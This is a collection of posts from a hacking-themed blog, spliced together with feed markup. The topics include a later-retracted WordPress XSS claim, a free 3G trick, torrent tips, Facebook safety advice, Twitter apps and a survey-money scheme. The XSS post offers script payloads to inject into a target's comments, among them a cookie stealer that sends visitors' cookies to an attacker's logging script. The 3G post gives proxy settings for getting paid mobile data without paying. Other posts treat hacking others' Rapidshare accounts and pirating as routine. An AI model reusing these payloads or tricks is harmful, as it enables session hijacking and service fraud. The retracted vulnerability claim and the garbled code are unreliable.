My earlier post about the XSS vulnerability in WordPress 3.2.1 turned out to be a False Alarm. WordPress allows the privileged users to post comments without filtering the HTML tags but for a normal underprivileged user it will filter the tags. I am sorry for the inconvenience. My Intentions were to make all you guys aware of this vulnerability so that you could save your blog from being hacked.

But now I am glad that WordPress is safe.

Bad news for just about every WordPress blogger out there. Thousands of WordPress 3.2.1 installations are at risk of being compromised. It has been found that the latest version 3.2.1 of WordPress, an extremely popular suite of tools for powering blogs, is vulnerable to XSS injection attack which allows users to inject malicious JavaScript as a result of failure in sanitizing the comments field. Without discussing much about what this vulnerability could do to your blog I will jump to how it works and the solution.

How does it work?

Inject one of the below codes into the comment field of the target. Or use your brain to make a more powerful injection

Popup “alert” Box
<script>alert(‘hungry-hackers.com’)</script>

Redirect to www.hungry-hackers.com
<script>document.location=”http://hungry-hackers.com”</script>

Cookie Stealer (need a logging system in place)
<script>document.location=***8221;***91;url***93;http://your-domain/your***91;/url***93; stealer.php?cookie=***8221; + document.cookie;document.location=***8221;http://the-site-you-are-stealing-from.com”</script>

Solution:

Upgrade to the latest version when available, In the meantime disable comments or hold comments for moderation as I did

According the Facebook statistics there are more than 750 Million Active facebook users. This makes is a very important target for all the hackers. I have no doubts that the developers at facebook are working 24×7 to make it as secure as possible but the hackers are also working 24×7 to find out a loophole using which they could take control of your account. But for our safety we also need to work a little harder. According to me, the best possible way to do this is by learning how to hack facebook yourself. If you know the loopholes you will never fall for it.

Now you might be thinking, how can I learn about hacking Facebook. If you ask me, I would say google it and learn it yourself. But I know that nobody has got so much time to search for each and every facebook hack possible. Luckily Rafay Baloch, the author of “A beginners Guide To Ethical Hacking”, has the answer to your question with his newly created “Facebook Hacking Course“.

Facebook hacking course is basically a set of videos which will show you different methods used by hackers to hack Facebook account passwords and how you can protect your self from getting hacked. It will include each and every possible methods that a hacker could use to get your facebook credentials. Along with each video you will get a lab which will tell you exactly how to replicate this attack in a safe environment. It also provides bonus techniques using which you could become anonymous on the internet. If you want to become a hacker this is the first thing you would want to learn. There is also a second bonus with it. You will get email support from none other than Rafay himself.

Now before you make your decision lets hear some words from Rafay: “Friends, if you ask me “Is Facebook safe?” my answer would be “Yes. Its safer than your own computer but remember it is still possible that your facebook account may get hacked and that is because all the hacking methods are client based and not server based, which means that the hackers directly attack you and not facebook. And securing your facebook account depends on how better you can avoid these attacks.”

Now I leave it up to you. You may go and take this course which I would highly recommend or you may leave it up to the hackers to find and hack your account.

How to get the Facebook Hacking Course?

You can get this Facebook hacking course from Here.

Are you tired of using the low speed 2G service? I know your answer is ‘YES’. We all want to lay our hands on the latest high speed 3G service which gives a  download speed of 500 kbps to 1000 kbps. Today I will show a trick using which you can use unlimited 3G service for free.

Requirements

1. Tata Docomo SIM Card with a balance of more than Rs. 1
2. 3G enabled cellphone

Steps

1. Create New Access Point Using Below Configuration and restart your cellphone.
   

   • Name : Tata Docomo or any
   • Access Point ( APN ) – tata.docomo.dive.in
   • Homepage : www.google.com or any
   • Proxy : 202.87.41.147
   • Proxy Port : 8080
   • Username : leave blank
   • Password : leave blank

2. Download Operamini 4.2 Handler Browser
3. Open your Opera mini handler and do the following changes in the Setiings:
   

   • Set Divein Settings as Default Settings For Opera Mini
   • Set http in Custom Field in your Opera Mini handler
   • Set Socket Server to http://203.115.112.5.server4.operamini.com OR http://10.124.72.171.server4.operamini.com
   • Keep Proxy Type as blank (Don’t Enter Anything in Proxy Server Field)

4. Done!! Now use your free unlimited 3G service. Enjoy!!

We all love torrents because they are free. In the last few weeks I have been downloading a lot of movies/softwares from torrents. While messing with the torrents I found a few things which turned out to be very fruitful. Today I will show you how to use those tricks to get maximum performance from your P2P Softwares.

Note: I use uTorrent so all the following Hacks have been tested on the latest version of uTorrent only. You may test it on other P2P softwares and let us know about your experience

1. Increase Download Speed

Do the following changes in the preference of uTorrent.

Go to Options>Preferences>Network

2. Block Fake Peers

Anti-P2P organizations are actively polluting P2P networks with fake peers, which send out fake or corrupt data in order to waste bandwidth and slow down file transfers. At its worst, when downloading major copyrighted torrents, as much as a fourth of the peers you are connected to can be attributed to various Anti-P2P agencies. There is also a much more serious side to this. Once you’ve established a connection to one of these fake “peers”, your IP has been logged and will most likely be sent to the RIAA/MPAA.

But there is a way to fight back! If you are using the latest uTorrent, you can employ a little known feature called IP filtering. The author of uTorrent has gone out of his way to hide it, but it’s there nonetheless. But before we can activate this filter, we need to retrieve a list of currently known Anti-P2P organization IPs.

This is most easily done by downloading the latest blacklist from Bluetack (the same people who wrote SafePeer for the Azureus BT client).

This list is updated daily, and contains all known Anti-P2P organizations, trackers and peers, aswell as all known Goverment/Military IP addresses as collected by the Bluetack team. Once downloaded, extract and rename the file to “ipfilter.dat” in preparation for the final step.

To make the list available to uTorrent, you need to put it in %AppData%\uTorrent\. So type this into the Address Bar, or click Start -> Run and type it there. After placing the ipfilter.dat in this folder, start uTorrent and go into preferences (Ctrl+P), then click on “Advanced”. In the right hand pane, make sure that “ipfilter.enable” is set to true, and then close the dialog. That’s it for the configuration.

You can verify that the list has been loaded by looking under the “Logging” tab of uTorrent, where you should see the line “Loaded ipfilter.dat (X entries)”.

3. Hide your IP

Your IP address is your online identity and could be used by hackers to break into your computer, steal personal information, or commit other crimes against you. Hide My IP allows you to surf anonymously, change your IP address, prevent identity theft, and guard against hacker intrusions. This software can not only be used in case of hiding your IP from other peers but also useful if you want to browse internet anonymously.

]]> http://www.hungry-hackers.com/2011/05/tips-to-get-maximum-performance-from-your-p2p-softwares.html/feed 4 http://www.hungry-hackers.com/2011/03/6-tips-to-avoid-facebook-viruses-and-spam-messages.html http://www.hungry-hackers.com/2011/03/6-tips-to-avoid-facebook-viruses-and-spam-messages.html#comments Sat, 05 Mar 2011 08:57:16 +0000 Ashik http://www.hungry-hackers.com/?p=1953 Facebook, the biggest social network with 500 million users, provides an interface to hit an unsuspecting crowd with malware and viruses. These viruses aren’t very difficult to detect  if you are cautious enough. These Facebook viruses appear on your wall in forms of a bizarre or eye-catching stories and videos and once the user has clicked/liked the link, it is already late. The next step will be getting rid of your Facebook virus which is a time-consuming  process.  Its better to avoid spam messages and trojan viruses in the first place.

How to avoid it?

1. Think before you Act. Viruses on Facebook are sneaky. The hackers and cybercriminals who want your information know that Facebook users will often click on an interesting post without a moment’s thought. If a post sounds a bit over-the-top like a headline out of a tabloid, this is your first warning sign.

2. Try to avoid Links and videos with Catchy words like  “funniest ever,” “most hilarious video on Facebook,” or “you’ve got to see this.” Do some keyword research to see if the post in question comes up in a search engine with information about a current virus or trojan.

3. Check the poster of the Suspicious content. If you receive a message from someone you do not know, this is an obvious red flag. Facebook video viruses also tend to pop up in your news feed or on your wall from friends you haven’t talked to in a while. Unfortunately, it’s likely this friend has already fallen victim to the latest virus on Facebook. After clicking on the story themselves, the message was sent out to all of their friends as well.

4 Avoid messages that have been posted by multiple users as the virus spreads among your friends who were not so cautious. If a link with title such as “Sexiest video ever” shows up all over your feed from all kinds of people (perhaps friends you would not expect to make such a post), this is another warning sign. Similar direct messages are a likely variant of the notorious Facebook Koobface virus which has used this approach in the past.

5. Do not fall for the “typical” money-transfer schemes. Chat messages from friends needing funds will usually sound suspicious. Everything can’t be screened before posting, so money transfer scams and hoax applications still find their way on to Facebook. You should also avoid applications that claim to do a full “Error check” or fix security problems related to your profile.

6. Update your anti-virus software frequently. If you do accidentally click on a post before realizing it is a hoax, do not click on any further links or downloads. If it’s too late and you have already been infected, the Facebook virus removal process may be effortless if you have a good anti-virus program to catch the virus, trojan or other malware early on.

What’s Next?

These were few important tips to safeguard your facebook account but your job isn’t done yet. Once you have detected that the link/post on your facebook wall is Malicious you should Mark it as SPAM so that the facebook support will stop it from spreading further and infecting other users.

If you have ever fallen victim of any such Malicious Scheme, please share your experience with all the users  in form of comments so that others don’t fall victim of it.

The popularity of Twitter has increased tremendously in past few years. As a result a lot of Twitter Desktop applications are available to the users for download these days. These applications allow you to receive and post Tweets from your desktop without visiting your Twitter.com page. To reduce your burden of finding the appropriate app for you from such a big pool of apps, we have compiled a list of Best Twitter Desktop apps available in the market. Earlier I had compiled a list of 20 Best Twitter Desktop Apps for Windows. Today I give you 9 Best Twitter Apps for Mac.

1. EventBox

This just-for-Mac app is a favorite of many because it supports Twitter, Facebook, Flickr integration, feed reading with Google Reader and internet trend watching with Reddit and Digg . Keyboard shortcuts, hotkeys, Instapaper integration, and photo uploads to Flickr and Facebook make EventBox pretty nifty. It’s also got a very slick interface with a navigation menu on the left-hand side.

2. Mac Lounge

This app is incredibly appealing for its dead simple, single column interface and respectable feature set. We, of course, love the multiple account support, but also appreciate saved searches, quick access to view followers and following, and tweet options to link to tweet, copy tweet, or copy tweet URL. There’s also an accompanying iPhone app, which syncs with the desktop version and greatly improves the app’s relevance.

3. Nambu

This really sophisticated Mac app should be more than enough for any and all of your Twitter needs. You’ve got access to your followers and friends, custom groups, search (integrated with FriendFeed and One Riot), trends, tr.im and pic.im integration, multiple accounts, Ping .fm integration, filters, and three view options for a one or many column view of tweets.

4. Sideline:

Sideline is just a search and trending topic app from Yahoo, but it does a darn good job at satisfying those specific needs. You can view current Twitter trends, select to see the three latest tweets or pop out as its own saved search, and create custom search groups as tabs.

5. Skimmer:

It’s hard not to love this app. Not only is it beautiful to look at it, but it also tracks your favorite social sites. Skimmer’s certainly not an application for the social media beginner, but power users of Facebook, Flickr, YouTube, Blogger, and Twitter, will appreciate the aggregation of content, filtering options, view types, and enhanced content viewing experience.

6. Tweetie

A full-featured Twitter client which is available in free ad supported and ad-free versions.  This Desktop app lets you view not only the tweets but also the entire conversation history leading to that tweet. It provides you with an independent compose windows that stay out of your way until you need them. Tweetie for Mac also has search trends to let you find out the hottest trend in Twitter. Other features include threaded DMs, user details, torn off search, bookmarklet, and preferences.

7. Twibble Desktop

Twibble is a bit of a riddle. It’s not a bad app when it comes to feature set, but it’s also not the most intuitive. You can manage multiple accounts, but all tweets are merged together in one stream. You can reply, DM, fav, RT, and copy tweets, but you’ll have to hover over the tweet to even know those behaviors are possible. You can also use keyboard shortcuts, filter your tweets for keywords, or conduct searches that open up in new windows, but Twibble just doesn’t seem to flow as easily as we’d like it to.

8. Twitterific

Lets you both read and publish posts or “tweets”  using a clean and concise  user interface designed to take up a minimum of real estate on your Mac’s desktop. The app shows a scrolling list of  the latest tweets from your friends, or public feeds. Its features include multiple Twitter account support, auto refreshing, inline display of replies and DMs, shows no. of unread tweets, quickly delete tweets, auto show/hide new tweets, single click access to user pages and more.

9. TwitterPod:

This app isn’t known for its sophistication or advanced Twitter functionality. TwitterPod is a basic single column Twitter app with an inline browser and the ability to filter for just tweets with links. Its heyday has long since passed, but original fan boys and girls may still be using this for their twittering.

Everybody wants a personal Rapidshare Premium account but not all can afford it. If you are one of those people who can’t afford it or don’t want to ask your parent to buy you one then there are only 2 ways of getting a Rapidshare premium account. First one is to hack a Rapidshare premium account of some other user. Hacking a Rapidshare premium account isn’t that difficult. But Rapidshare guys are very smart. They provide users with a feature of security lock due to which you will need access to the unlock code for that account to change the password of that Rapidshare account. Thus you can only use that hacked account till the owner of that account changes the password. This one seems to be a temporary solution. Second way is to earn some easy bucks online and buy your own Rapidshare account. The second way may seem difficult at first but to tell you the truth its very easy.

Today I will show how you can earn money online and that too without much difficulty. Just follow the steps given below:

1. Create a Paypal Premium Account( Don’t Worry its free) . When asked for credit card details simply say cancel. You do not need to fill it.

2. Then Go to the following link:

http://www.AWSurveys.com

3. On joining this website, you will get 27 USD just for writing 7 simple surveys which will take not more than 30 minutes.

4. Now the only problem is that the minimum payout limit for this website is 75 USD. But you can earn 1.25 USD on referring this website to your friend.

5. So you just take the referral link from this website and paste it on your facebook status. Don’t forget to mention about it benefits so that your friends register through that link.

6. Suppose you have 500 friends on facebook and out of them only 10% register through your link then also you earn 62.5 USD which gets added to 27 USD that you had earned from surveys. Thus the total 89.5 USD crosses the Payout limit.

7. Now you can get that money into your Paypal Account use it not only to buy your own Rapidshare premium account but also for buying other stuff online.

8. That’s it. So Simple and I swear it works.

Update: Some people have a compliant that Awsurveys doesn’t pay them what they have earned and that it is a SPAM. I would like to tell you that I have already used this website earlier and I had received the payment every time. I am not saying that these guys are lying about their experience with Awsurveys but there are few reasons why they may not have received the payment. The only problem with this website is that it doesn’t communicate with the user if he is violating any terms and conditions instead of that it just cancels their payments. When you request some payout from this website, they have a policy to verify if the accounts that were referred by the user are not fraudulent and they remove the amount gained from these fraudulent accounts from the total amount in your account. Sometimes the reduced amount is less than the amount redeemed by the user and their harsh policy is to cancel the whole payment without even reimbursing the remaining amount. Now you might be thinking how to avoid this? One advice i would give you is to keep atleast 20-25 USD in excess when you are redeeming the amount. In this way you are making sure that even if there were 15 accounts which the website found to be fraudulent still the total wont get below the amount requested by you. Another condition is  of the maximum amount that one can redeem in a year. A user can redeem at max 550 USD in one year if you request for payout more than that then hey will just cancel that payment without reimbursing the money in your account. I already faced the latter one which indicates that I have atleast earned upto 550 USD.

You’ll be notified every time there is a new post on the Hacking Truths Blog or something new is there on the internet.

Plus, we would love it if you would re-tweet the posts and discuss them, so more people get to know about us and join our community.

Thank you!

You all might be knowing about the “Write for Hungry Hackers” program that we had started few years back. This program has always got us some great minds. This time we have got another Hacker who will teach you some amazing and hardcore hacking stuff. I would like to introduce you to Irfan Shakeel, a new author for our blog. Irfan Shakeel is an Ethical Hacker/Security Researcher. He is a Telecommunication engineer and he is from Pakistan. He currently runs his own blog at http://www.ehacking.net and now he will write for us.

Irfan’s Expertise

Irfan’ s expertise include Penetration Testing. He has done a great job in the field of penetration testing. He has found some amazing loop holes in websites like Google, Facebook, Daily Motion etc. The following pic is just one of the example. If you want to read more about his endeavors you can click here.

I would like to wish him luck for his journey as an author on Hungry Hackers.